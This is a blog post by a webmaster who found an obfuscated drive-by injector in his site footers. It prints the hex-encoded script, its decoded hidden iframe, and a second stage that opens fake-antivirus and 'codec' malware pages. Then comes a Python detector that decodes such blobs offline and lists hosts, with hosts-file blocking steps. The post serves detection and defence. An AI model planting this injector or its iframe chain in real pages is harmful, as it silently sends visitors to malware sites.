Recently I noticed something other than Google Analytics loading in the status bar when I visited some of my sites, so I thought I'd have a closer look.
Three of my sites had hidden links added in the footer and two of them had a piece of JavaScript.
Of course, I removed the links without thinking, but I did save the script.
Here is how the script looks:
<!-- ~ -->
<script type="text/javascript">
function oxsletpvxjt(qixfiot){
var ddrbvc="";
for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){
ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));
}document.write(ddrbvc);
}
oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, ""));
</script>
<!-- ~ -->
Here is what the script decodes (strip the "psbmbvr" filler, then read the rest as hex pairs) and writes into the page:
<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>
Here is what that hidden iframe loads from tumultuosum.com:
<iframe src="http://razmarin.net/a32/index.php"></iframe>
<iframe src="http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/66"></iframe>
<script language=JavaScript>
window.open("http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/67", "_blank");
window.open("http://www.youpornztube.com/codec/5060f17b673b0b9bba790dd61bb6de34/14/68", "_blank");
</script>
Probably a trojan of some kind; I didn't feel like looking any further.
The interesting thing is how that code got on my websites. I'm sure my account was not hacked; if it had been, all my sites would have been messed with, so I'm guessing it was the server that got hacked. What people will do for a few extra links and traffic.
So make sure you look at the source of your websites, and if you find that piece of JavaScript at the end (it sits between two <!-- ~ --> comment markers, which makes it easy to search for), just remove it.
As for visitors, I guess you should block that site so you won't get infected with who knows what.
The easiest way to do that is to edit your hosts file.
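Rather than letting the browser run the decoder, you can decode the blob offline and see exactly which hosts a page would load from. The script below is an added example written for this post, not code from the injector or from any tool it mentions: it mirrors what oxsletpvxjt() does (drop the filler word, turn hex pairs into characters), scans a page for scripts with that fromCharCode/parseInt(...,16) fingerprint, and lists the hostnames in whatever they decode to. The sample page it scans is constructed here around the footer script shown above, and the copy of the second stage is taken from the iframe content above; the function names are my own.

```python
import re

# Obfuscated argument copied verbatim from the injected footer script shown above.
INJECTED_ARG = (
    "3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22"
    "psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73"
    "psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64"
    "psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3D"
    "psbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79"
    "psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73"
    "psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69"
    "psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E"
)

# Constructed test page: the injector exactly as it sat in the footer, between the
# two <!-- ~ --> markers, surrounded by ordinary page content.
SAMPLE_PAGE = """<html><body>
<p>Ordinary page content.</p>
<!-- ~ -->
<script type="text/javascript">
function oxsletpvxjt(qixfiot){
var ddrbvc="";
for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){
ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));
}document.write(ddrbvc);
}
oxsletpvxjt("__BLOB__".replace(/psbmbvr/g, ""));
</script>
<!-- ~ -->
</body></html>""".replace("__BLOB__", INJECTED_ARG)

# Constructed copy of the second stage that tumultuosum.com/ep/index.php served.
SECOND_STAGE = """<iframe src="http://razmarin.net/a32/index.php"></iframe>
<iframe src="http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/66"></iframe>
<script language=JavaScript>
window.open("http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/67", "_blank");
window.open("http://www.youpornztube.com/codec/5060f17b673b0b9bba790dd61bb6de34/14/68", "_blank");
</script>"""

SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
# The decoder's fingerprint: fromCharCode fed by parseInt(..., 16), i.e. hex pairs to text.
DECODER_SIGNATURE = re.compile(r"fromCharCode.*?parseInt\s*\(.*?,\s*16\s*\)", re.S)
# A quoted alphanumeric blob followed by .replace(/filler/g, "") that strips the junk letters.
OBFUSCATED_ARG = re.compile(r'"([0-9A-Za-z]+)"\s*\.replace\(\s*/([A-Za-z0-9]+)/g\s*,\s*""\s*\)')
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def decode_payload(blob, filler):
    """What oxsletpvxjt() does, minus document.write: strip the filler, read hex pairs."""
    hexstr = blob.replace(filler, "")
    if len(hexstr) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", hexstr):
        raise ValueError("not a clean hex string after removing the filler")
    # String.fromCharCode on values 0-255 is exactly a Latin-1 decode.
    return bytes.fromhex(hexstr).decode("latin-1")


def extract_hosts(markup):
    """Hostnames of every http(s) URL in a chunk of HTML or JavaScript, sorted, deduplicated."""
    return sorted({m.group(1).lower() for m in URL_HOST.finditer(markup)})


def find_injections(html):
    """Find scripts that hex-decode a blob and write it into the page; decode them offline."""
    hits = []
    for script in SCRIPT_BLOCK.finditer(html):
        body = script.group(1)
        if not DECODER_SIGNATURE.search(body):
            continue
        for blob, filler in OBFUSCATED_ARG.findall(body):
            try:
                decoded = decode_payload(blob, filler)
            except ValueError:
                continue  # fromCharCode/parseInt present but the argument is not this scheme
            hits.append({
                "filler": filler,
                "decoded": decoded,
                "hosts": extract_hosts(decoded),
                "hidden_iframe": "<iframe" in decoded.lower() and bool(HIDDEN_STYLE.search(decoded)),
            })
    return hits


def hosts_file_lines(hostnames):
    """Lines to append to the hosts file so those names resolve to the local machine."""
    return ["127.0.0.1 " + h for h in hostnames]


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_PAGE):
        print("filler word:", hit["filler"])
        print("decoded:    ", hit["decoded"])
        print("loads from: ", ", ".join(hit["hosts"]))
    # The second stage is plain HTML, so its hosts can be pulled out directly.
    print("\n".join(hosts_file_lines(extract_hosts(SECOND_STAGE))))
```

Point find_injections() at the saved HTML of each of your pages; a hit whose decoded markup is a hidden iframe pointing off-site is the thing to remove, and the hosts it lists (plus whatever the second stage pulls in) are the names to block.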
Where to find the hosts file:
Windows Vista = C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows XP = C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows 2K = C:\WINNT\SYSTEM32\DRIVERS\ETC
Win 98/ME = C:\WINDOWS
What the hosts file contents look like:
127.0.0.1 localhost
Edit it and add the unwanted site:
127.0.0.1 tumultuosum.com
How it should look now:
127.0.0.1 localhost
127.0.0.1 tumultuosum.com
The hidden iframe chains on to razmarin.net, www.antivirxp08.com and www.youpornztube.com as well, so add a line for each of those too. On Vista the file is protected, so open your editor as administrator or the save will fail.
So if anyone knows John Phillips, the person who seems to own the domain “tumultuosum”, tell him that either he got hacked or he's just a big fat jerk and a lousy hacker.